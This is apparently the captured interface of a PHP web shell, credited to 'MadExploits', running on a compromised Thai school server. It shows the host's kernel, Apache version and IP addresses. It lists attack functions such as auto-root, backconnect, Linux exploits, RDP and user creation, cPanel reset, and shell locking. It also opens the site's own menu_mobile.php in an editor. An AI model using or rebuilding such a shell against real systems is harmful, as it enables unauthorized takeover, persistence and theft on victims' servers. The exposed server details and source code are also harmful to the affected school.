Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
bets /
[ HOME SHELL ]
Name
Size
Permission
Action
expand
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxrwxrwx
upload_files2
[ DIR ]
drwxr-xr-x
default.php
605
B
-rwxr-xr-x
index.php
723
B
-rwxr-xr-x
menu.php
7.74
KB
-rwxr-xr-x
menu_mobile.php
1.11
KB
-rwxr-xr-x
time_inc.php
5.1
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu_mobile.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $sql_permission = "select * from bets_permission where person_id='$_SESSION[login_user_id]'"; $dbquery_permission = mysqli_query($connect,$sql_permission); $result_permission = mysqli_fetch_array($dbquery_permission); echo "<table width='100%' border='0' cellspacing='0' cellpadding='0'>"; echo "<tr bgcolor='#FFCC00'><td>"; echo "<ul id='nav' class='dropdown dropdown-horizontal'>"; echo "<li><a href='./'>รายการหลัก</a></li>"; if($_SESSION['login_status']==16){ echo "<li><a href='?option=bets&task=main/test_student' class='dir'>ทดสอบ</a>"; echo "<ul>"; echo "<li><a href='?option=bets&task=main/test_student'>รายการสอบ</a></li>"; echo "</ul>"; echo "</li>"; } if($_SESSION['login_status']==16){ echo "<li><a href='?option=bets&task=main/student_report_1_mobile' class='dir'>รายงานผลการสอบ</a></li>"; } echo "</ul>"; echo "</td></tr>"; echo "</table>"; ?>
Close